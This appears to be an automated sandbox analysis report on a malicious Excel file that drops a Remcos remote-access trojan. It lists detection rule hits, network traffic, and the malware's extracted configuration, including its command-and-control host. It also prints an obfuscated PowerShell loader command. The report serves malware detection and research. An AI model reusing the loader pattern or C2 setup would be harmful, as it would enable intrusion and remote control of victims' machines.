Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3720, TargetFilename: C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 54.150.207.131, SourceIsIpv6: false, SourcePort: 443
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" , ProcessId: 3936, ProcessName: wscript.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3720, TargetFilename: C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline
Source: Registry Key set | Author: frack113 | Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3312, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))", CommandLine: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3720, TargetFilename: C:\Users\user\AppData\Local\Temp\wma5vyw1.4zt.ps1

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3720, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline", ProcessId: 3840, ProcessName: csc.exe

                  Stealing of Sensitive Information

                  Source: Registry Key set | Author: Joe Security | Data: Details: 56 E7 E9 B6 89 90 F0 48 10 C0 5C 93 B3 0D E0 10 36 C8 8F 70 B2 34 03 42 67 0B 25 61 F3 8C 4E 8D CC 6D F7 B5 39 60 88 40 BE 58 91 10 A0 6F AA 0F 54 DC 28 B8 43 CA B7 9E 41 AA 8F 6C B7 90 9C C9 3B A5 AD 49 3B 4F 60 FB DC 19 14 0C 4D 8F B4 CD 6A A9 61 A4 4C 03 2C AB 60 57 61 11 32 84 F3 A7 D6 97 28 C3 2A E9 20 9E 31 2C AB 85 7B B1 0B E9 89 45 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 1200, TargetObject: HKEY_CURRENT_USER\Software\Rmc-Z4DJFI\exepath

                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-12-03T14:00:57.033630+0100 | 2024197 | 1 | A Network Trojan was detected | 142.93.65.161 | 80 | 192.168.2.22 | 49166 | TCP
                  2024-12-03T14:01:01.567149+0100 | 2024197 | 1 | A Network Trojan was detected | 142.93.65.161 | 80 | 192.168.2.22 | 49168 | TCP
                  2024-12-03T14:00:57.033411+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49166 | 142.93.65.161 | 80 | TCP
                  2024-12-03T14:01:01.567076+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49168 | 142.93.65.161 | 80 | TCP
                  2024-12-03T14:01:23.117892+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49175 | 142.93.65.161 | 80 | TCP
                  2024-12-03T14:01:40.318974+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 142.93.65.161 | 80 | 192.168.2.22 | 49177 | TCP
                  2024-12-03T14:01:54.412303+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 142.93.65.161 | 80 | 192.168.2.22 | 49181 | TCP
                  2024-12-03T14:01:40.318974+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 142.93.65.161 | 80 | 192.168.2.22 | 49177 | TCP
                  2024-12-03T14:01:54.412303+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 142.93.65.161 | 80 | 192.168.2.22 | 49181 | TCP
                  2024-12-03T14:01:43.467133+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49178 | 31.13.224.72 | 4044 | TCP
                  2024-12-03T14:01:45.963112+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49179 | 31.13.224.72 | 4044 | TCP
                  2024-12-03T14:00:52.957814+0100 | 2057635 | 1 | A Network Trojan was detected | 142.93.65.161 | 80 | 192.168.2.22 | 49177 | TCP
                  2024-12-03T14:01:38.675522+0100 | 2049038 | 1 | A Network Trojan was detected | 151.101.65.137 | 443 | 192.168.2.22 | 49176 | TCP
                  2024-12-03T14:01:46.425588+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.22 | 49180 | 178.237.33.50 | 80 | TCP
                  2024-12-03T14:00:52.957814+0100 | 2858295 | 1 | A Network Trojan was detected | 142.93.65.161 | 80 | 192.168.2.22 | 49177 | TCP
                  2024-12-03T14:01:39.948886+0100 | 2858796 | 1 | A Network Trojan was detected | 192.168.2.22 | 49177 | 142.93.65.161 | 80 | TCP
                  2024-12-03T14:01:53.979899+0100 | 2858796 | 1 | A Network Trojan was detected | 192.168.2.22 | 49181 | 142.93.65.161 | 80 | TCP
                  2024-12-03T14:01:11.531099+0100 | 2858795 | 1 | A Network Trojan was detected | 192.168.2.22 | 49169 | 142.93.65.161 | 80 | TCP

                  AV Detection

                  Source: 00000020.00000002.555858192.0000000000585000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["lonan.duckdns.org:4044:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-Z4DJFI", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                  Source: 0200011080.xls | ReversingLabs: Detection: 13%
                  Source: Yara match | File source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000020.00000002.555858192.0000000000585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTR
                  Source: 0200011080.xls | Joe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 29_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,29_2_00404423
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,32_2_0043293A
                  Source: CasPol.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

                  Exploits

                  Source: Yara match | File source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTR

                  Privilege Escalation

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_00406764 _wcslen,CoGetObject,32_2_00406764

                  Phishing

                  Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingpersonwithhergirlfriendsheisbeautiful[1].hta, type: DROPPED
                  Source: unknown | HTTPS traffic detected: 151.101.65.137:443 -> 192.168.2.22:49176 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: unknown | HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49165 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49167 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49173 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49174 version: TLS 1.2
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.pdb source: powershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.pdbhP source: powershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.pdb source: powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.pdbhP source: powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: .pdb- source: powershell.exe, 00000007.00000002.474546983.000000001C398000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 29_2_0040AE51 FindFirstFileW,FindNextFileW,29_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 30_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,30_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 31_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,31_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,32_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,32_2_0041B42F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,32_2_0040B53A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_0044D5E9 FindFirstFileExA,32_2_0044D5E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,32_2_004089A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_00406AC2 FindFirstFileW,FindNextFileW,32_2_00406AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,32_2_00407A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,32_2_00418C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,32_2_00408DA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 32_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,32_2_00406F06
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                  Software Vulnerabilities

                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\mshta.exe
                  Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: global traffic | DNS query: name: short.ruksk.com
                  Source: global traffic | DNS query: name: res.cloudinary.com
                  Source: global traffic | DNS query: name: apamanollonan.duckdns.org
                  Source: global traffic | DNS query: name: geoplugin.net
                  Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 54.150.207.131:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 54.150.207.131:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49180 -> 178.237.33.50:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49181 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
